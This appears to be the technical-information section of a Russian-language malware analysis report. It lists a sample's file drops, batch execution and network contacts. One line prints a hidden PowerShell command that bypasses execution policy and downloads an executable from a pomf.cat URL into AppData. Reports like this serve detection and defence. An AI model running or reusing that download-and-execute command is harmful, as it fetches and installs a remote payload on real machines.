Техническая информация
- https://a.pomf.cat/ujaozu.exe как %appdata%\dfshjhdxzwdfsn.exe
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" "
- C:\users\public\documents\sadjjhdsf.bat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/ujaozu.exe','%APPDATA%\DFSHJhdxzwdfsn.exe');
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" " (со скрытым окном)